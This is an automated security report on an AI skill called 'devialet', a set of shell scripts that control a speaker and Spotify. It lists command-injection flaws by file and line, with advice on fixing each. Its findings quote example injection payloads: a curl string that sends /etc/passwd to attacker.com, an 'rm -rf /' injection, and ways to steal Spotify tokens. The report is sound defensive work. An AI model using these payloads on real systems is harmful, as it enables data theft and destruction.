Trust Assessment
devialet received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 7 findings: 5 critical, 1 high, 1 medium, and 0 low severity. Key findings include Sensitive environment variable access: $HOME, Command Injection via JSON payload in devialet.sh, Command Injection via URL path in devialet.sh.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings7
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Command Injection via JSON payload in devialet.sh The `$ARG` variable, which can be controlled by user input, is directly interpolated into a JSON string within a `curl -d` argument. An attacker can inject shell metacharacters or JSON syntax to break out of the JSON structure and inject arbitrary `curl` arguments or shell commands. For example, `$ARG` could be `50}" --data-binary @/etc/passwd http://attacker.com #` to exfiltrate local files. Sanitize or properly escape user-controlled input (`$ARG`) before interpolating it into JSON strings. Consider using a dedicated JSON parsing library or a safer method for constructing JSON payloads, or strictly validate input to ensure it's a number. | LLM | scripts/devialet.sh:139 | |
| CRITICAL | Command Injection via URL path in devialet.sh The `$ARG` variable, which can be controlled by user input, is directly interpolated into the URL path for a `curl` command. An attacker can inject shell metacharacters (e.g., `"; rm -rf / #`) to execute arbitrary commands or path traversal sequences (e.g., `../../etc/passwd`) to access restricted files. Sanitize or properly escape user-controlled input (`$ARG`) before interpolating it into URL paths. Ensure that only valid, expected characters are allowed for the source ID. | LLM | scripts/devialet.sh:169 | |
| CRITICAL | Command Injection via JSON payload in play-on-devialet.sh The `$ARG2` variable, which can be controlled by user input, is directly interpolated into a JSON string within a `curl -d` argument. This is identical to the vulnerability found in `devialet.sh`, allowing an attacker to inject shell metacharacters or JSON syntax to break out of the JSON structure and inject arbitrary `curl` arguments or shell commands. Sanitize or properly escape user-controlled input (`$ARG2`) before interpolating it into JSON strings. Consider using a dedicated JSON parsing library or a safer method for constructing JSON payloads, or strictly validate input to ensure it's a number. | LLM | scripts/play-on-devialet.sh:130 | |
| CRITICAL | Command Injection via unsanitized input in play-on-devialet.sh (curl/dbus-send) The `$query` variable (user-controlled input) is only partially encoded (`sed 's/ /%20/g'`) before being used in a `curl` URL and a `dbus-send` string. This leaves it vulnerable to shell metacharacter injection (e.g., `"` or backticks) which could allow an attacker to break out of the string and inject arbitrary `curl` arguments or shell commands. Ensure all user-controlled input is fully sanitized and escaped for shell execution contexts. For URLs, use a robust URL encoding function that handles all special characters. For D-Bus strings, ensure proper escaping of quotes and other delimiters. | LLM | scripts/play-on-devialet.sh:60 | |
| CRITICAL | Command Injection and Credential Harvesting in spotify.sh (OAuth & API calls) The `spotify.sh` script exhibits multiple critical command injection vulnerabilities. User-controlled inputs (`$code`, `$device_id`, `$uri`, `$volume`) and sensitive Spotify API credentials (`$CLIENT_ID`, `$CLIENT_SECRET`, `$refresh_token`, `$access_token`) are directly interpolated into shell commands (`xdg-open`, `curl` arguments, JSON payloads) without proper escaping. This allows an attacker to:
1. Execute arbitrary shell commands by injecting metacharacters into `xdg-open` or `curl` arguments (e.g., `scripts/spotify.sh auth` with a malicious `CLIENT_ID`).
2. Exfiltrate sensitive Spotify API credentials (client ID, secret, refresh/access tokens) or other local files (e.g., `/etc/passwd`) by injecting `curl` arguments like `--data-binary @/path/to/secret http://attacker.com` into various API calls.
3. Manipulate JSON payloads for `curl -d` by injecting quotes and other JSON/shell metacharacters into `$uri` or `$volume`. Implement comprehensive input validation and shell escaping for all variables derived from user input or sensitive credentials before they are used in shell commands or interpolated into JSON strings. For `curl` commands, prefer using `--data-urlencode` or `--json` flags where appropriate, and ensure all arguments are properly quoted. For `xdg-open`/`open`, ensure the URL is strictly validated and encoded. Sensitive credentials should be handled with extreme care, ideally not directly interpolated into shell commands without robust protection. | LLM | scripts/spotify.sh:62 | |
| HIGH | Excessive Permissions: Use of xdotool for desktop automation The script uses `xdotool`, a powerful tool capable of simulating keyboard and mouse input. While currently used for a simple `Return` key press, its presence indicates a high level of control over the user's desktop environment. If an attacker could manipulate arguments to `xdotool` (e.g., via other command injection vulnerabilities), they could perform arbitrary actions on the user's system, such as opening applications, typing commands, or clicking UI elements. Re-evaluate the necessity of `xdotool`. If essential, ensure that all arguments passed to `xdotool` are strictly controlled and not derived from untrusted input. Implement robust input validation and escaping for any user-controlled data that might indirectly influence `xdotool` commands. | LLM | scripts/play-on-devialet.sh:86 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/jgm2025/devialet/scripts/spotify.sh:22 |
Scan History
Embed Code
[](https://skillshield.io/report/0c2e7898d168e2c8)
Powered by SkillShield